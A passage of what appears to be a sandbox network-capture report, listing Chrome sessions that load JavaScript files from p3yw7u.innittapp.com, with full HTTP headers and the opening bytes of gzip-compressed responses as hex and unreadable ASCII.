                                          Sec-Fetch-Dest: script
                                          Referer: https://551000l.cc/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:25 UTC719INHTTP/1.1 200 OK
                                          Content-Type: application/javascript; charset=utf-8
                                          Content-Length: 11957
                                          Connection: close
                                          Server: Default-server-KS-CLOUD-XG-FOREIGN-12-05
                                          ETag: W/"64d5b951-b083"
                                          Date: Sun, 29 Dec 2024 00:01:01 GMT
                                          Last-Modified: Fri, 11 Aug 2023 04:30:09 GMT
                                          Expires: Tue, 28 Jan 2025 00:01:01 GMT
                                          Age: 1210583
                                          Cache-Control: max-age=86400
                                          Accept-Ranges: bytes
                                          Vary: Accept-Encoding
                                          Content-Encoding: gzip
                                          Access-Control-Allow-Origin: *
                                          X-Frame-Options: SAMEORIGIN
                                          X-Cache: HIT
                                          uuid: -
                                          out-line: gb-cdn-212
                                          x-link-via: xg21:443;xg12:80;
                                          X-Cache-Status: MISS from KS-CLOUD-XG-FOREIGN-12-05
                                          X-Cache-Status: HIT from KS-CLOUD-XG-FOREIGN-21-10
                                          X-Cdn-Request-ID: 7aeda86d07940dd3f77b742a01fccbf6
                                          2025-01-12 00:17:25 UTC11957INData Raw: 1f 8b 08 00 00 00 00 00 00 03 dd 7d fd 73 db b8 d1 f0 ef fd 2b 64 4e eb 23 2d 4a 96 92 6b 9f 96 0a a5 c9 39 ce 9d 7b f1 25 4d dc bb e4 5c 4f 06 e2 87 44 5b 16 15 4a 8a e3 58 fa df 9f dd 05 40 02 20 28 3b b9 74 9e 77 de 99 c4 22 f1 b1 58 2c 16 8b c5 62 b1 3c 3c f8 53 eb a0 f5 e6 26 5b 24 45 eb 51 f7 7f ba 3d 7c 3f cd c7 d9 2c 69 ad f2 75 34 6d 2d 67 59 0c 99 6c 1e b7 d2 82 5d 27 37 79 71 d5 ba c9 56 d3 d6 94 15 f1 0d 2b 92 16 8b a2 64 96 14 6c 95 c4 ad 55 c1 e6 cb 6c 95 e5 f3 25 80 42 68 d3 d5 6a 11 1c 1e de dc dc 74 b3 98 cd 27 49 91 77 d7 cb 43 0e 17 7e a9 f1 43 51 f8 28 5f dc 16 d9 64 ba 6a 3d ea f5 7b 1d f8 f3 bd df fa 75 c6 e2 ec 3a 2b 5a 3f 43 93 33 76 bd c8 e2 0c 0b 9f 4d 93 56 f6 ac 04 b9 a3 31 01 fd 45 16 25 f3 25 60 b9 9e 63 9f 7e 7c f5 a2 b5 df
                                          Data Ascii: }s+dN#-Jk9{%M\OD[JX@ (;tw"X,b<<S&[$EQ=|?,iu4m-gYl]'7yqV+dlUl%Bhjt'IwC~CQ(_dj={u:+Z?C3vMV1E%%`c~|


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          130192.168.2.449882103.198.200.74435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:24 UTC550OUTGET /ftl/commonPage/js/websocket/Comet.js HTTP/1.1
                                          Host: p3yw7u.innittapp.com
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: */*
                                          Sec-Fetch-Site: cross-site
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: script
                                          Referer: https://551000l.cc/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:25 UTC718INHTTP/1.1 200 OK
                                          Content-Type: application/javascript; charset=utf-8
                                          Content-Length: 4031
                                          Connection: close
                                          Server: Default-server-KS-CLOUD-XG-FOREIGN-12-05
                                          ETag: W/"60f60fb5-43bc"
                                          Date: Sat, 28 Dec 2024 22:12:32 GMT
                                          Last-Modified: Mon, 19 Jul 2021 23:50:13 GMT
                                          Expires: Mon, 27 Jan 2025 22:12:32 GMT
                                          Age: 1217092
                                          Cache-Control: max-age=86400
                                          Accept-Ranges: bytes
                                          Vary: Accept-Encoding
                                          Content-Encoding: gzip
                                          Access-Control-Allow-Origin: *
                                          X-Frame-Options: SAMEORIGIN
                                          X-Cache: HIT
                                          uuid: -
                                          out-line: gb-cdn-213
                                          x-link-via: xg21:443;xg12:80;
                                          X-Cache-Status: MISS from KS-CLOUD-XG-FOREIGN-12-05
                                          X-Cache-Status: HIT from KS-CLOUD-XG-FOREIGN-21-13
                                          X-Cdn-Request-ID: 4ea6b045816192c12ef7c23d95b6daf4
                                          2025-01-12 00:17:25 UTC4031INData Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 1b fd 53 1b c7 f5 77 fe 8a 8b 26 63 04 16 92 d3 9f 3a a2 d4 05 a1 26 34 36 30 16 6e c7 f5 78 34 42 3a b0 12 71 a7 b9 3b d9 61 1c 66 14 d7 89 f1 b7 27 f1 77 28 8d 1d d7 a6 49 01 3b e9 d8 18 70 fc c7 94 93 c4 4f f9 17 ba 6f f7 76 6f 77 6f 57 12 ce 47 d3 99 ee 30 e8 b4 bb ef ed db b7 6f df e7 29 d5 df df 63 c0 5f aa 67 a6 66 15 bd b2 6d 19 87 73 65 cf cc d8 73 a6 17 ef 33 ce f4 2c f4 f4 84 3d c9 aa 63 7b b6 37 5f 35 8d 21 34 d6 63 a0 96 ea ef 37 5a eb cf 1b 4f cf fa d7 ce 36 6e 3e f1 af 5f f9 7e fb 9e 7f fd 72 63 f5 ef 80 18 e6 e4 8e 8d 67 de 39 32 31 3e f6 e7 6c fe dd ec b1 b4 11 cb e7 f2 99 89 c3 d9 a9 58 82 21 21 20 7e 7d 1b c0 17 3f f7 b7 36 5b af 96 1b 57 19 92 cc c4 f8 78 36 33 35 36 31 9e ff e3 f0 a1 a3 59 84 25 a3 01
                                          Data Ascii: Sw&c:&460nx4B:q;af'w(I;pOovowoWG0o)c_gfmses3,=c{7_5!4c7ZO6n>_~rcg921>lX!! ~}?6[Wx63561Y%


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          131192.168.2.449886103.198.200.74435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:26 UTC558OUTGET /ftl/commonPage/js/websocket/CometMarathon.js HTTP/1.1
                                          Host: p3yw7u.innittapp.com
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: */*
                                          Sec-Fetch-Site: cross-site
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: script
                                          Referer: https://551000l.cc/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:26 UTC718INHTTP/1.1 200 OK
                                          Content-Type: application/javascript; charset=utf-8
                                          Content-Length: 3316
                                          Connection: close
                                          Server: Default-server-KS-CLOUD-XG-FOREIGN-12-01
                                          ETag: W/"6260ddd4-2f13"
                                          Date: Sat, 28 Dec 2024 22:12:32 GMT
                                          Last-Modified: Thu, 21 Apr 2022 04:30:12 GMT
                                          Expires: Mon, 27 Jan 2025 22:12:32 GMT
                                          Age: 1217094
                                          Cache-Control: max-age=86400
                                          Accept-Ranges: bytes
                                          Vary: Accept-Encoding
                                          Content-Encoding: gzip
                                          Access-Control-Allow-Origin: *
                                          X-Frame-Options: SAMEORIGIN
                                          X-Cache: HIT
                                          uuid: -
                                          out-line: gb-cdn-212
                                          x-link-via: xg21:443;xg12:80;
                                          X-Cache-Status: MISS from KS-CLOUD-XG-FOREIGN-12-01
                                          X-Cache-Status: HIT from KS-CLOUD-XG-FOREIGN-21-06
                                          X-Cdn-Request-ID: 0fd5b7f0889c213308068297f9282a95
                                          2025-01-12 00:17:26 UTC3316INData Raw: 1f 8b 08 00 00 00 00 00 00 03 c5 1a 6d 4f 1b 47 fa 3b bf 62 b3 3a 15 93 18 3b d5 7d 39 99 e3 ee c0 b8 0d d7 60 50 4c ee 94 8b 22 6b b1 07 70 6b 76 ad dd 75 38 94 22 39 b9 a4 21 ef d1 35 ef a5 5c 93 a6 29 6d 8f bc b4 55 42 08 6d 7e cc b1 6b f3 29 7f e1 9e 79 d9 d9 99 d9 5d 03 69 a5 ae 10 b6 67 e6 79 9d 67 9e b7 d9 ec fe fd 3d 1a fe cb f6 4c 37 cd 8a 5b b3 4c 6d ac 54 73 51 de 9a 43 ee 98 61 1b ee ac 65 a6 fa b4 53 3d 8b 3d 3d d1 99 4c c3 b6 5c cb 5d 68 20 6d 10 d6 f4 68 f0 64 f7 ef d7 3a 4f 5e f8 cf ce 78 d7 ce f8 37 9f 7a d7 af bc d9 bc e7 5d bf ec af 7d 85 09 e1 35 a5 63 c5 fc a1 23 e3 c5 d1 7f 14 ca 1f 14 8e e5 34 bd 5c 2a e7 c7 c7 0a 93 7a 9a 23 a1 20 5e 6b 13 83 2f 7d e6 bd da e8 bc 5e f1 af 72 24 f9 f1 62 b1 90 9f 1c 1d 2f 96 ff 36 74 f8 68 01 b0 e4
                                          Data Ascii: mOG;b:;}9`PL"kpkvu8"9!5\)mUBm~k)y]igyg=L7[LmTsQCaeS===L\]h mhd:O^x7z]}5c#4\*z# ^k/}^r$b/6th


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          132192.168.2.449884103.198.200.74435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:26 UTC550OUTGET /ftl/commonPage/js/websocket/PopUp.js HTTP/1.1
                                          Host: p3yw7u.innittapp.com
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: */*
                                          Sec-Fetch-Site: cross-site
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: script
                                          Referer: https://551000l.cc/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:26 UTC716INHTTP/1.1 200 OK
                                          Content-Type: application/javascript; charset=utf-8
                                          Content-Length: 797
                                          Connection: close
                                          Server: Default-server-KS-CLOUD-XG-FOREIGN-12-05
                                          ETag: W/"6260ddd4-828"
                                          Date: Sun, 29 Dec 2024 01:25:20 GMT
                                          Last-Modified: Thu, 21 Apr 2022 04:30:12 GMT
                                          Expires: Tue, 28 Jan 2025 01:25:20 GMT
                                          Age: 1205525
                                          Cache-Control: max-age=86400
                                          Accept-Ranges: bytes
                                          Vary: Accept-Encoding
                                          Content-Encoding: gzip
                                          Access-Control-Allow-Origin: *
                                          X-Frame-Options: SAMEORIGIN
                                          X-Cache: HIT
                                          uuid: -
                                          out-line: gb-cdn-213
                                          x-link-via: xg21:443;xg12:80;
                                          X-Cache-Status: MISS from KS-CLOUD-XG-FOREIGN-12-05
                                          X-Cache-Status: HIT from KS-CLOUD-XG-FOREIGN-21-08
                                          X-Cdn-Request-ID: 724a5c4cd576a61f672650c770de4118
                                          2025-01-12 00:17:26 UTC797INData Raw: 1f 8b 08 00 00 00 00 00 00 03 cd 56 5b 4f d4 40 14 7e ef af 18 9b 0d ed c2 d2 35 31 f1 61 09 51 2e 2f 98 00 26 e0 93 31 64 b6 9d dd 2d f4 96 e9 94 4b 48 13 45 d1 0d 9a 80 09 8a 97 08 91 f8 60 8c c1 35 26 c8 65 f9 37 b4 85 27 ff 82 33 bd ec b6 cb 8a 3e f0 e0 79 99 ed 39 df 9c f3 f5 9c 6f a6 5b 71 0c 99 a8 a6 01 c6 a7 54 82 ee 9a d6 3d 4b cc 83 65 97 e3 da 0e c9 c2 26 31 c9 92 85 c0 20 58 e6 38 40 4d 51 a1 66 56 47 a0 a6 0d 43 79 ae 04 2a 49 1e 51 81 04 d2 0c 21 8a d9 3c c4 80 f9 26 cb b3 74 7b 4e b2 20 b6 d1 9d a9 c9 89 08 39 d0 02 ca a6 61 9b 1a 92 54 a3 62 8a fc d9 de ee f9 9b d5 e0 fb b1 b7 fd fc f4 e0 88 07 7d 49 16 c9 76 ca b6 8c d5 32 9a 66 94 fa 00 1f bc 7b 12 c3 57 0e fd cd 7d af de f0 f7 eb fe a3 6f bf 9a 2f fc fa 86 b7 b6 73 d6 78 1c 6c 7e f6 de
                                          Data Ascii: V[O@~51aQ./&1d-KHE`5&e7'3>y9o[qT=Ke&1 X8@MQfVGCy*IQ!<&t{N 9aTb}Iv2f{W}o/sxl~


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          133192.168.2.449885103.198.200.74435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:26 UTC543OUTGET /ftl/commonPage/js/lazyload.js HTTP/1.1
                                          Host: p3yw7u.innittapp.com
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: */*
                                          Sec-Fetch-Site: cross-site
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: script
                                          Referer: https://551000l.cc/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:26 UTC717INHTTP/1.1 200 OK
                                          Content-Type: application/javascript; charset=utf-8
                                          Content-Length: 2731
                                          Connection: close
                                          Server: Default-server-KS-CLOUD-XG-FOREIGN-12-01
                                          ETag: W/"64d05f66-2f79"
                                          Date: Sun, 29 Dec 2024 00:01:04 GMT
                                          Last-Modified: Mon, 07 Aug 2023 03:05:10 GMT
                                          Expires: Tue, 28 Jan 2025 00:01:04 GMT
                                          Age: 1210581
                                          Cache-Control: max-age=86400
                                          Accept-Ranges: bytes
                                          Vary: Accept-Encoding
                                          Content-Encoding: gzip
                                          Access-Control-Allow-Origin: *
                                          X-Frame-Options: SAMEORIGIN
                                          X-Cache: HIT
                                          uuid: -
                                          out-line: gb-cdn-211
                                          x-link-via: xg21:443;xg12:80;
                                          X-Cache-Status: HIT from KS-CLOUD-XG-FOREIGN-12-01
                                          X-Cache-Status: HIT from KS-CLOUD-XG-FOREIGN-21-01
                                          X-Cdn-Request-ID: 3de627b9690cbcafdba9228d2874ef9c
                                          2025-01-12 00:17:26 UTC2731INData Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 5a 6f 8f db 48 19 7f bf 9f 62 1a ad 1a a7 9b b5 d3 8a 72 dc 86 bd a3 77 57 d0 a2 2d 85 6b 0b 2f 96 05 79 ed 49 e2 d6 f1 98 f1 b8 69 e8 e5 1d 82 de 49 85 43 9c 7a e8 5e 21 71 02 84 44 8b 84 04 12 a2 c7 97 69 7a f0 2d 78 9e 99 b1 3d 76 9c c4 d9 6e 7b f7 82 51 d5 75 66 9e f9 cd f3 7f 9e f1 d8 b9 70 6e 8b 5c 20 87 ee 4f a7 e4 90 b9 3e d9 25 df 76 ef ba 37 3c 1e c4 82 c4 61 3a 0c 22 32 60 9c 84 48 11 02 45 10 0d 49 30 76 87 34 81 89 38 f7 6d 16 4f 79 30 1c 09 62 79 1d 72 a9 d7 7b 6d f7 52 ef e2 eb e4 5a 70 c7 25 37 d3 34 66 a1 ab 49 0f 03 8f 46 09 f5 49 1a f9 94 13 31 a2 e4 da c1 4d 12 aa ee 3d 24 21 64 24 44 bc e7 38 93 c9 c4 66 31 f4 b3 94 7b d4 66 7c e8 68 ba c4 19 07 62 57 ff b0 e3 51 ac d1 bf cb d9 6d ea 09 32 62 63 13 2b
                                          Data Ascii: ZoHbrwW-k/yIiICz^!qDiz-x=vn{Qufpn\ O>%v7<a:"2`HEI0v48mOy0byr{mRZp%74fIFI1M=$!d$D8f1{f|hbWQm2bc+


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          134192.168.2.449883103.198.200.74435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:26 UTC543OUTGET /ftl/commonPage/js/gui-base.js HTTP/1.1
                                          Host: p3yw7u.innittapp.com
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: */*
                                          Sec-Fetch-Site: cross-site
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: script
                                          Referer: https://551000l.cc/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:26 UTC719INHTTP/1.1 200 OK
                                          Content-Type: application/javascript; charset=utf-8
                                          Content-Length: 15779
                                          Connection: close
                                          Server: Default-server-KS-CLOUD-XG-FOREIGN-12-01
                                          ETag: W/"64ddbaed-ee5c"
                                          Date: Sun, 29 Dec 2024 00:01:05 GMT
                                          Last-Modified: Thu, 17 Aug 2023 06:15:09 GMT
                                          Expires: Tue, 28 Jan 2025 00:01:05 GMT
                                          Age: 1210579
                                          Cache-Control: max-age=86400
                                          Accept-Ranges: bytes
                                          Vary: Accept-Encoding
                                          Content-Encoding: gzip
                                          Access-Control-Allow-Origin: *
                                          X-Frame-Options: SAMEORIGIN
                                          X-Cache: HIT
                                          uuid: -
                                          out-line: gb-cdn-211
                                          x-link-via: xg21:443;xg12:80;
                                          X-Cache-Status: MISS from KS-CLOUD-XG-FOREIGN-12-01
                                          X-Cache-Status: HIT from KS-CLOUD-XG-FOREIGN-21-04
                                          X-Cdn-Request-ID: 5011911065c91babb12c65c61af9e781
                                          2025-01-12 00:17:26 UTC15665INData Raw: 1f 8b 08 00 00 00 00 00 00 03 d5 7d fd 97 1b c7 71 e0 cf e6 5f 31 3b 5a ef ce 2c 06 58 80 34 65 0b d8 d9 7d e4 92 b4 68 4b 22 45 52 92 93 bd 95 de 00 18 2c 86 c4 62 20 60 c0 25 b5 8b 7b 4a 62 47 92 2d c5 8a f3 61 c7 71 72 96 e3 17 e9 e9 22 39 f7 12 df 39 b2 7d f9 e1 fe 94 d3 2e c9 9f f2 2f 5c 55 57 77 4f f7 4c cf 00 4b 4a 79 ef 60 8b 3b d3 1f d5 55 d5 55 d5 d5 d5 1f 63 ad af 2d 9d b1 d6 ac 6f 06 fb e1 c5 f8 de 4b 57 ab df ba 59 6d 07 93 d0 72 8e ff db 67 0f 3e 78 f3 e1 77 7f 7a f2 b3 7f fa 8f df bd 83 a5 ee 86 e3 49 14 0f ad 46 ad 5e 6b 60 c2 85 69 d2 8f c7 4d eb 66 12 de 0d 87 98 72 29 48 42 6b 3f ee 46 bd 28 ec 5a 67 eb 8d af 57 eb 5f ab 9e 7d 06 f2 d6 cf 58 ac 35 5f fe ac 4e bc bf 1f 0f ab c7 df fb a7 e3 ef fd 0f 6a 4a c9 a6 3a bd e9 b0 93 60 ab e3 70
                                          Data Ascii: }q_1;Z,X4e}hK"ER,b `%{JbG-aqr"99}./\UWwOLKJy`;UUc-oKWYmrg>xwzIF^k`iMfr)HBk?F(ZgW_}X5_NjJ:`p
                                          2025-01-12 00:17:26 UTC114INData Raw: e3 ce 9d 83 e0 6e c8 5a ad e9 af b6 94 50 16 e4 ca c3 93 9c 1f b1 b9 f9 64 67 55 02 b0 18 84 d5 dd 54 c6 67 2e 33 05 40 04 a7 51 60 88 a6 bd 0f 36 31 1c 57 93 08 2f 0c e7 57 1e 9d d1 da cd 95 a2 9b f8 5a 92 35 4b a2 bb 55 ca f5 5a 56 2d 4e fa f0 d8 e9 8f d5 66 8a 0a 77 71 af 54 8d 0d 40 4e e3 7c 5d d1 d7 59 eb ff 01 44 bd cf 01 5c ee 00 00
                                          Data Ascii: nZPdgUTg.3@Q`61W/WZ5KUZV-NfwqT@N|]YD\


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          135192.168.2.449887103.198.200.74435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:26 UTC555OUTGET /ftl/commonPage/js/bootstrap-dialog.min.js HTTP/1.1
                                          Host: p3yw7u.innittapp.com
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: */*
                                          Sec-Fetch-Site: cross-site
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: script
                                          Referer: https://551000l.cc/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:26 UTC718INHTTP/1.1 200 OK
                                          Content-Type: application/javascript; charset=utf-8
                                          Content-Length: 5007
                                          Connection: close
                                          Server: Default-server-KS-CLOUD-XG-FOREIGN-12-05
                                          ETag: W/"5d848f4f-4ea4"
                                          Date: Sat, 28 Dec 2024 21:18:01 GMT
                                          Last-Modified: Fri, 20 Sep 2019 08:35:27 GMT
                                          Expires: Mon, 27 Jan 2025 21:18:01 GMT
                                          Age: 1220365
                                          Cache-Control: max-age=86400
                                          Accept-Ranges: bytes
                                          Vary: Accept-Encoding
                                          Content-Encoding: gzip
                                          Access-Control-Allow-Origin: *
                                          X-Frame-Options: SAMEORIGIN
                                          X-Cache: HIT
                                          uuid: -
                                          out-line: gb-cdn-213
                                          x-link-via: xg21:443;xg12:80;
                                          X-Cache-Status: MISS from KS-CLOUD-XG-FOREIGN-12-05
                                          X-Cache-Status: HIT from KS-CLOUD-XG-FOREIGN-21-07
                                          X-Cdn-Request-ID: 5041f233dcf5bbca9b6bbe470fed6668
                                          2025-01-12 00:17:26 UTC5007INData Raw: 1f 8b 08 00 00 00 00 00 00 03 d5 3c 0d 73 db 36 b2 7f c5 e1 74 7c e4 85 62 9c a4 f7 31 52 99 8e 63 3b a9 a7 89 9d 67 bb d7 eb 39 9a 0c 25 82 14 6d 8a d4 91 54 12 9f c2 ff fe 76 f1 45 00 04 25 a5 cd 7b 6f 5e a7 e3 48 c0 2e b0 d8 2f ec 2e 00 b9 c9 ba 98 37 59 59 b8 91 3f f3 36 59 e2 36 0f 2b 52 26 07 cb 32 5e e7 e4 51 18 3a eb 22 26 49 56 90 d8 39 3c 64 ad 01 f9 bc 2a ab a6 f6 36 fa f7 70 e6 56 e4 df eb ac 22 ae 73 f7 ef 35 a9 1e 1c cf 8d 3c af 25 79 4d 94 b1 d9 78 21 8c 2d 66 87 a1 59 63 10 2d 63 6f c3 3e bb ce ac 2c 9b ba a9 a2 d5 28 ce a2 bc 4c 1d ff 56 0c 3c f5 25 e5 73 6f 53 91 66 5d 15 07 33 f8 dc f2 e9 a2 e0 a5 c0 3e a5 c8 40 5d 14 dc fd 17 62 7b 6d db ba cd 22 ab bb 41 60 d6 8f 51 75 30 0b e3 20 29 02 58 57 94 07 27 65 01 f8 eb 79 53 56 13 ec 9c 87
                                          Data Ascii: <s6t|b1Rc;g9%mTvE%{o^H./.7YY?6Y6+R&2^Q:"&IV9<d*6pV"s5<%yMx!-fYc-co>,(LV<%soSf]3>@]b{m"A`Qu0 )XW'eySV


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          136192.168.2.449888103.198.200.74435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:26 UTC540OUTGET /ftl/commonPage/js/layer.js HTTP/1.1
                                          Host: p3yw7u.innittapp.com
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: */*
                                          Sec-Fetch-Site: cross-site
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: script
                                          Referer: https://551000l.cc/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:26 UTC718INHTTP/1.1 200 OK
                                          Content-Type: application/javascript; charset=utf-8
                                          Content-Length: 7599
                                          Connection: close
                                          Server: Default-server-KS-CLOUD-XG-FOREIGN-12-03
                                          ETag: W/"5d848f4f-55f6"
                                          Date: Sat, 28 Dec 2024 21:18:02 GMT
                                          Last-Modified: Fri, 20 Sep 2019 08:35:27 GMT
                                          Expires: Mon, 27 Jan 2025 21:18:02 GMT
                                          Age: 1220363
                                          Cache-Control: max-age=86400
                                          Accept-Ranges: bytes
                                          Vary: Accept-Encoding
                                          Content-Encoding: gzip
                                          Access-Control-Allow-Origin: *
                                          X-Frame-Options: SAMEORIGIN
                                          X-Cache: HIT
                                          uuid: -
                                          out-line: gb-cdn-211
                                          x-link-via: xg21:443;xg12:80;
                                          X-Cache-Status: MISS from KS-CLOUD-XG-FOREIGN-12-03
                                          X-Cache-Status: HIT from KS-CLOUD-XG-FOREIGN-21-08
                                          X-Cdn-Request-ID: 1770726dc90711df6faff59a6d3c154e
                                          2025-01-12 00:17:26 UTC7599INData Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 3c ed 6e e3 48 72 ff f3 14 32 ef 22 93 2b 8a a6 64 8f 3d 43 99 16 66 66 67 92 01 66 73 97 db 41 ee 16 5a 05 a0 a9 96 c5 1d 8a d4 91 2d cf 78 2d fd 49 f2 28 79 81 00 41 80 e0 02 e4 65 72 48 1e 23 55 d5 1f ec a6 28 cf ee 26 30 60 b1 3f d8 5d 5d df 55 dd cd b3 af 4e 7a 79 f2 c0 aa e1 fd 79 30 0a c2 de ef d9 ed 9f ff e3 df ff fc 2f ff f0 df 7f fa a7 ff fa d3 bf f5 be 79 f7 a1 f7 3e 4b 59 51 b3 5e 6f c5 f9 26 3a 3b a3 17 02 f8 bf cd 82 b4 5c 9f f5 7a af 1e 7a ff f3 af ff fc e7 ff fc c7 de 57 67 7f d1 9b 9c 2c b7 45 ca b3 b2 70 99 cf bd 47 67 0b 2f d7 bc ca 52 ee 4c ee 93 aa 97 f9 85 9f c4 4c 0c d1 ef 8b 91 16 6c 99 15 cc 2f e3 c7 3b c6 7f 9b f0 55 a4 47 f1 1e f1 2d 16 2f ca 74 bb 66 05 0f ea b4 ca 36 bc f6 79 cc 66 30 0c 2b ee
                                          Data Ascii: <nHr2"+d=CffgfsAZ-x-I(yAerH#U(&0`?]]UNzyy0/y>KYQ^o&:;\zzWg,EpGg/RLLl/;UG-/tf6yf0+


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          137192.168.2.449890103.198.200.74435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:26 UTC370OUTGET /ftl/commonPage/js/float.js HTTP/1.1
                                          Host: p3yw7u.innittapp.com
                                          Connection: keep-alive
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: */*
                                          Sec-Fetch-Site: none
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:27 UTC718INHTTP/1.1 200 OK
                                          Content-Type: application/javascript; charset=utf-8
                                          Content-Length: 1929
                                          Connection: close
                                          Server: Default-server-KS-CLOUD-XG-FOREIGN-12-05
                                          ETag: W/"612747ba-1b2f"
                                          Date: Sat, 28 Dec 2024 21:18:01 GMT
                                          Last-Modified: Thu, 26 Aug 2021 07:50:18 GMT
                                          Expires: Mon, 27 Jan 2025 21:18:01 GMT
                                          Age: 1220365
                                          Cache-Control: max-age=86400
                                          Accept-Ranges: bytes
                                          Vary: Accept-Encoding
                                          Content-Encoding: gzip
                                          Access-Control-Allow-Origin: *
                                          X-Frame-Options: SAMEORIGIN
                                          X-Cache: HIT
                                          uuid: -
                                          out-line: gb-cdn-213
                                          x-link-via: xg21:443;xg12:80;
                                          X-Cache-Status: MISS from KS-CLOUD-XG-FOREIGN-12-05
                                          X-Cache-Status: HIT from KS-CLOUD-XG-FOREIGN-21-13
                                          X-Cdn-Request-ID: 5792e9d22b5796a2d3bb07d75d114068
